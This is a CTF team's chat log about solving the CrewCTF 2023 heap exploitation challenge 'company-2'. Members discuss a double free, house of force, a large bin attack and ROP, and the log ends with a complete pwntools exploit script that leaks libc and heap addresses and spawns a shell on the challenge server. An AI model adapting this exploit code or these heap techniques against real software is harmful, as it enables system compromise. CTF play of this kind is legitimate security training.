Project Sekai
🔒 CrewCTF 2023 / ✅-pwn-company-2
Sutx pinned a message to this channel. 07/08/2023 10:02 AM
Avatar
@Surg wants to collaborate 🤝
10:07
@nyancat0131 wants to collaborate 🤝
10:08
@4n0nym4u5 wants to collaborate 🤝
Avatar
if ( IDX > 0xF ) return puts("Sorry Not Allowed!"); negative index possible?
Avatar
@Zafirr wants to collaborate 🤝
Avatar
unsigned op at least in register
10:09
dunno if can do tho
10:10
no null on free
10:10
again
Avatar
maybe can just mod your old exploit a bit lol
Avatar
nah it doesnt work
10:10
different way for feedback
10:11
this one i think is basically a bunch of heap massaging with the double free
10:11
cause theres no pointers to abuse in the chunk anymore msfrog
10:13
let me see if i can solve something
10:14
double free
10:14
i am still waiting for kernel to build
Avatar
can make size < 72
10:15
to do oob write
10:16
msfrog
10:16
but i'm afraid
10:16
read will return -1
Avatar
oh
10:32
must use size > 0x500 (edited)
10:32
thats why i said we need to massage the heap msfrog
Avatar
msfrog let's see if i can cook
10:40
lol because mmap will actually unmmap so it will crash when setting size to 0
10:40
sad
10:40
cannot cook
Avatar
i'm getting it
Avatar
not yet, my method is too slow since it requires writing too much data.
12:56
i'll think more after getting some sleep
12:56
or maybe it will be magically solved
Avatar
have a nice sleep and carry us :pepaga
Avatar
oh we can just do house of force on this
17:15
this is a trick i taught this guy lmao
17:15
i made a chall for it a few months back for a local ctf
Avatar
Avatar
Zafirr
this is a trick i taught this guy lmao
the author
Avatar
plagiarism 🖕
Avatar
lmao
17:20
so you can solve ig
Avatar
yeah i can do it
17:21
gonna eat first though
Avatar
😂 this still no solve?
Avatar
nyancat0131 07/08/2023 6:32 PM
house of again…
Avatar
house of why, god, why?
Avatar
nyancat0131 07/08/2023 6:36 PM
i actually never used house of force
Avatar
nyancat0131 07/08/2023 6:49 PM
i'll try it in the meantime
Avatar
im 1 chunk short 😐
18:54
rewrite exploit time
Avatar
nyancat0131 07/08/2023 6:58 PM
i got corrupted top size
Avatar
theres a new check, you need to overwrite av->system_mem first
19:02
with large bin attack
19:02
thats the "trick"
Avatar
nyancat0131 07/08/2023 7:03 PM
lol
Avatar
nyancat0131 07/08/2023 7:33 PM
ok i fixed the system mem
19:33
now time to attack
Avatar
Avatar
Zafirr
used /ctf solve
✅ Challenge solved.
Avatar
i hate this challenge
19:42
too many tiny annoyances
Avatar
what ended up being the final solve?
19:43
if you can read it xd
Avatar
nyancat0131 07/08/2023 7:54 PM
why rop
19:54
🐛
Avatar
i tried changing strlen got but it didnt work 🙃
19:55
unaligned stack
Avatar
nyancat0131 07/08/2023 7:55 PM
funny
19:56
i'm trying to use exit list
Avatar
this challenge's structure layout killed off my attempts to use exit list.
22:10
which i dont really like
Avatar
you're still trying? xd
Avatar
cuz environ is
22:10
unstable offset
22:10
i dont wanna predict it
22:10
i wrote rop on local
22:10
but seems the offset is not the same
Avatar
```python
#!/usr/bin/env python3
from pwn import *

context.terminal = ['tmux', 'sp', '-h', '-p', '80']

#r = process('./company')
r = remote('company-v2.chal.crewc.tf', 17002)
l = ELF('./libc.so.6', False)


def ss(x):
    return str(x).encode('ascii')


def register(idx, size, name, pos, salary):
    r.sendlineafter(b'>> ', b'1')
    r.sendline(ss(idx))
    r.sendline(ss(size))
    r.sendafter(b'Name: ', name)
    r.sendafter(b'Position: ', pos)
    r.sendlineafter(b'Salary: ', ss(salary))


def free(idx):
    r.sendlineafter(b'>> ', b'2')
    r.sendline(ss(idx))


def feedback(idx_self, idx_other, data):
    r.sendlineafter(b'>> ', b'3')
    r.sendline(ss(idx_self))
    r.sendline(ss(idx_other))
    r.send(data)


def view(idx):
    r.sendlineafter(b'>> ', b'4')
    r.sendline(ss(idx))


def mangle(x):
    return ((x << 0x11) | (x >> (64 - 0x11))) & 0xffffffffffffffff


def demangle(x):
    return ((x >> 0x11) | (x << (64 - 0x11))) & 0xffffffffffffffff


r.sendlineafter(b'name? ', b'HR')

register(0, 0x508, b'0', b'0', 0)
register(1, 0x528, b'1', b'1', 1)  # p1
free(0)
free(1)
register(2, 0xA38, b'\xe0', b'HR', 2)
register(3, 0x508, b'3', b'3', 3)  # g1

view(0)
r.recvuntil(b'Name: ')
l.address = u64(r.recvn(6) + b'\x00\x00') - 0x1f6ce0
log.info('libc = 0x%x', l.address)

feedback(0, 2, b'\x00' * 0x4d0 + p64(0x21))
free(1)
view(1)
r.recvuntil(b'Name: ')
heap = u64(r.recvn(5) + b'\x00\x00\x00') << 12
log.info('heap = 0x%x', heap)

register(4, 0x518, b'4', b'4', 4)  # p2
register(5, 0x508, b'5', b'5', 5)  # g2
feedback(0, 2, b'\x00' * 0x4d0 + p64(0x531))
free(1)
register(6, 0x538, b'6', b'6', 6)  # g3
free(4)
feedback(0, 2, b'\x00' * 0x4d0 + p64(0x531) + p64(l.address + 0x1f7110) + p64(l.address + 0x1f7110) + p64(0) + p64(l.address + 0x1f7508 - 0x20))
register(7, 0x538, b'7', b'7', 7)  # g4
free(7)
free(6)
register(8, 0xA80, b'\xe0', b'HR', 8)
feedback(6, 8, b'\x00' * 0x528 + p64(0x20000))
feedback(6, 7, b'\x00' * 0x510 + p64(0x550000000000))

evil_size = (l.symbols['environ'] - 0x10) - 8 * 4 - (heap + 0x26a0)
register(9, evil_size, b'9', b'9', 9)
register(10, 0x538, b'A' * 0x10, b'\x00', 0)
view(10)
r.recvuntil(b'A' * 0x10)
environ = u64(r.recvn(6) + b'\x00\x00')
log.info("environ = 0x%x", environ)

evil_size = (environ - 0x138) - 8 * 4 - (l.address + 0x1fe840)
register(11, evil_size, b'\x00', b'\x00', 0)
register(12, 0x538, b'\x00', b'\x00', l.address + 0x34589)  # add rsp, 0x18 ; ret
feedback(0, 12, p64(l.address + 0x22fd9) + p64(l.address + 0x240e5) + p64(l.address + 0x1B51D2) + p64(l.symbols['system']))

r.sendlineafter(b'>> ', b'6')
r.interactive()
```
22:21
my exploit
22:21
i hate this ctf
22:22
actually i have skill issue
22:22
msfrog